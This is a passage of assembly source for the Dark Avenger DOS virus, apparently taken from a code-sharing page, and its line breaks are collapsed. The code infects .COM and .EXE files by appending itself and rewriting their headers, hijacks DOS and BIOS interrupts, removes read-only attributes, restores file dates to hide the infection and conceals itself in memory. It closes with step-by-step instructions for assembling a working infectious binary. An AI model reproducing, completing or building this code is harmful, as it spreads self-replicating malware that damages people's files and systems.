📄 darkav.asm
字号:
pop ds popfdummy proc far ;??? ret 2dummy endp ; Checks whether the file is .COM or .EXE.; It is not called upon file execution. see_name: push ax push si mov si,dxscan_name: lodsb test al,al jz bad_name cmp al,'.' jnz scan_name call get_byte mov ah,al call get_byte cmp ax,'co' jz pos_com cmp ax,'ex' jnz good_name call get_byte cmp al,'e' jmp short good_namepos_com: call get_byte cmp al,'m' jmp short good_namebad_name: inc algood_name: pop si pop ax ret ; Converts into lowercase (the subroutines are a great thing). get_byte: lodsb cmp al,'C' jc byte_got cmp al,'Y' jnc byte_got add al,20hbyte_got: ret ; Calls the original INT 21h. function: pushf call dword ptr cs:[save_int_21] ret ; Arrange to infect an executable file. do_file: push ds ;Save the registers in stack push es push si push di push ax push bx push cx push dx mov si,ds xor ax,ax mov ds,ax les ax,ds:[24h*4] ;Saves INT 13h and INT 24h in stack push es ;and changes them with what is needed push ax mov ds:[24h*4],offset int_24 mov ds:[24h*4+2],cs les ax,ds:[13h*4] mov word ptr cs:[save_int_13],ax mov word ptr cs:[save_int_13+2],es mov ds:[13h*4],offset int_13 mov ds:[13h*4+2],cs push es push ax mov ds,si xor cx,cx ;Arranges to infect Read-only files mov ax,4300h call function mov bx,cx and cl,0feh cmp cl,bl je dont_change mov ax,4301h call function stcdont_change: pushf push ds push dx push bx mov ax,3d02h ;Now we can safely open the file call function jc cant_open mov bx,ax call disease mov ah,3eh ;Close it call functioncant_open: pop cx pop dx pop ds popf jnc no_update mov ax,4301h ;Restores file's attributes call function ;if they were changed (just in case)no_update: xor ax,ax ;Restores INT 13h and INT 24h mov ds,ax pop ds:[13h*4] pop ds:[13h*4+2] pop ds:[24h*4] pop ds:[24h*4+2] pop dx ;Register restoration pop cx pop bx pop ax pop di pop si pop es pop ds ret ; This routine is the working horse. disease: push cs pop ds push cs pop es mov dx,offset top_save ;Read the file beginning mov cx,18h mov ah,3fh int 21h xor cx,cx xor dx,dx mov ax,4202h ;Save file length int 21h mov word ptr [top_save+1ah],dx cmp ax,offset my_size ;This should be top_file sbb dx,0 jc stop_fuck_2 ;Small files are not infected mov word ptr [top_save+18h],ax cmp word ptr [top_save],5a4dh jne com_file mov ax,word ptr [top_save+8] add ax,word ptr [top_save+16h] call mul_16 add ax,word ptr [top_save+14h] adc dx,0 mov cx,dx mov dx,ax jmp short see_sickcom_file: cmp byte ptr [top_save],0e9h jne see_fuck mov dx,word ptr [top_save+1] add dx,103h jc see_fuck dec dh xor cx,cx ; Check if the file is properly infected see_sick: sub dx,startup-copyright sbb cx,0 mov ax,4200h int 21h add ax,offset top_file adc dx,0 cmp ax,word ptr [top_save+18h] jne see_fuck cmp dx,word ptr [top_save+1ah] jne see_fuck mov dx,offset top_save+1ch mov si,dx mov cx,offset my_size mov ah,3fh int 21h jc see_fuck cmp cx,ax jne see_fuck xor di,dinext_byte: lodsb scasb jne see_fuck loop next_bytestop_fuck_2: retsee_fuck: xor cx,cx ;Seek to the end of file xor dx,dx mov ax,4202h int 21h cmp word ptr [top_save],5a4dh je fuck_exe add ax,offset aux_size+200h ;Watch out for too big .COM files adc dx,0 je fuck_it ret ; Pad .EXE files to paragraph boundary. This is absolutely unnecessary. fuck_exe: mov dx,word ptr [top_save+18h] neg dl and dx,0fh xor cx,cx mov ax,4201h int 21h mov word ptr [top_save+18h],ax mov word ptr [top_save+1ah],dxfuck_it: mov ax,5700h ;Get file's date int 21h pushf push cx push dx cmp word ptr [top_save],5a4dh je exe_file ;Very clever, isn't it? mov ax,100h jmp short set_adrexe_file: mov ax,word ptr [top_save+14h] mov dx,word ptr [top_save+16h]set_adr: mov di,offset call_adr stosw mov ax,dx stosw mov ax,word ptr [top_save+10h] stosw mov ax,word ptr [top_save+0eh] stosw mov si,offset top_save ;This offers the possibilities to movsb ;some nasty programs to restore movsw ;exactly the original length xor dx,dx ;of the .EXE files mov cx,offset top_file mov ah,40h int 21h ;Write the virus jc go_no_fuck ;(don't trace here) xor cx,ax jnz go_no_fuck mov dx,cx mov ax,4200h int 21h cmp word ptr [top_save],5a4dh je do_exe mov byte ptr [top_save],0e9h mov ax,word ptr [top_save+18h] add ax,startup-copyright-3 mov word ptr [top_save+1],ax mov cx,3 jmp short write_headergo_no_fuck: jmp short no_fuck ; Construct the .EXE file's header do_exe: call mul_hdr not ax not dx inc ax jne calc_offs inc dxcalc_offs: add ax,word ptr [top_save+18h] adc dx,word ptr [top_save+1ah] mov cx,10h div cx mov word ptr [top_save+14h],startup-copyright mov word ptr [top_save+16h],ax add ax,(offset top_file-offset copyright-1)/16+1 mov word ptr [top_save+0eh],ax mov word ptr [top_save+10h],100h add word ptr [top_save+18h],offset top_file adc word ptr [top_save+1ah],0 mov ax,word ptr [top_save+18h] and ax,1ffh mov word ptr [top_save+2],ax pushf mov ax,word ptr [top_save+19h] shr byte ptr [top_save+1bh],1 rcr ax,1 popf jz update_len inc axupdate_len: mov word ptr [top_save+4],ax mov cx,18hwrite_header: mov dx,offset top_save mov ah,40h int 21h ;Write the file beginningno_fuck: pop dx pop cx popf jc stop_fuck mov ax,5701h ;Restore the original file date int 21hstop_fuck: ret ; The following is used by the INT 21h and INT 27h handlers in connection; to the program hiding in memory from those who don't need to see it.; The whole system is absurde and meaningless and it is also another source; for program conflicts. alloc: push ds call get_chain mov byte ptr ds:[0],'M' pop ds ; Assures that the program is the first one in the processes,; which have intercepted INT 21h (yet another source of conflicts). ontop: push ds push ax push bx push dx xor bx,bx mov ds,bx lds dx,ds:[21h*4] cmp dx,offset int_21 jne search_segment mov ax,ds mov bx,cs cmp ax,bx je test_complete ; Searches the segment of the sucker who has intercepted INT 21h, in; order to find where it has stored the old values and to replace them.; Nothing is done for INT 27h. xor bx,bxsearch_segment: mov ax,[bx] cmp ax,offset int_21 jne search_next mov ax,cs cmp ax,[bx+2] je got_himsearch_next: inc bx jne search_segment je return_controlgot_him: mov ax,word ptr cs:[save_int_21] mov [bx],ax mov ax,word ptr cs:[save_int_21+2] mov [bx+2],ax mov word ptr cs:[save_int_21],dx mov word ptr cs:[save_int_21+2],ds xor bx,bx ; Even if he has not saved them in the same segment, this won't help him. return_control: mov ds,bx mov ds:[21h*4],offset int_21 mov ds:[21h*4+2],cstest_complete: pop dx pop bx pop ax pop ds ret ; Fetch the segment of the last MCB get_chain: push ax push bx mov ah,62h call function mov ax,cs dec ax dec bxnext_blk: mov ds,bx stc adc bx,ds:[3] cmp bx,ax jc next_blk pop bx pop ax ret ; Multiply by 16 mul_hdr: mov ax,word ptr [top_save+8]mul_16: mov dx,10h mul dx ret db 'This program was written in the city of Sofia ' db '(C) 1988-89 Dark Avenger',0 ; INT 13h handler.; Calls the original vectors in BIOS, if it's a writing call int_13: cmp ah,3 jnz subfn_ok cmp dl,80h jnc hdisk db 0eah ;JMP XXXX:YYYYmy_size: ;--- Up to here comparisondisk: ; with the original is made dd 0hdisk: db 0eah ;JMP XXXX:YYYYfdisk: dd 0subfn_ok: db 0eah ;JMP XXXX:YYYYsave_int_13: dd 0call_adr: dd 100h stack_pointer: dd 0 ;The original value of SS:SPmy_save: int 20h ;The original contents of the first nop ;3 bytes of the filetop_file: ;--- Up to here the code is writtenfilehndl equ $ ; in the filesfilename equ filehndl+2 ;Buffer for the name of the opened filesave_int_27 equ filename+65 ;Original INT 27h vectorsave_int_21 equ save_int_27+4 ;Original INT 21h vectoraux_size equ save_int_21+4 ;--- Up to here is moved into memorytop_save equ save_int_21+4 ;Beginning of the buffer, which ;contains ; - The first 24 bytes read from file ; - File length (4 bytes) ; - The last bytes of the file ; (my_size bytes)top_bz equ top_save-copyrightmy_bz equ my_size-copyrightcode ends end------------------------------------------------------------------------------ A few notes on assembling this virus. It's a little bit tricky assembling the Dark Avenger Virus. Use these steps below. I use Turbo Assembler 2.0, but I'm positve that MASM will work just as well. 1: TASM AVENGER.ASM 2: TLINK AVENGER.OBJ 3: EXE2BIN AVENGER AVENGER.COM Now make a 3 byte file named JUMP.TMP using DEBUG like this 4: DEBUG n jmp.tmp e 0100 E9 68 00 rcx 3 w q 5: Now do this COPY JMP.TMP + AVENGER.COM DAVENGER.COM There you have it....⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -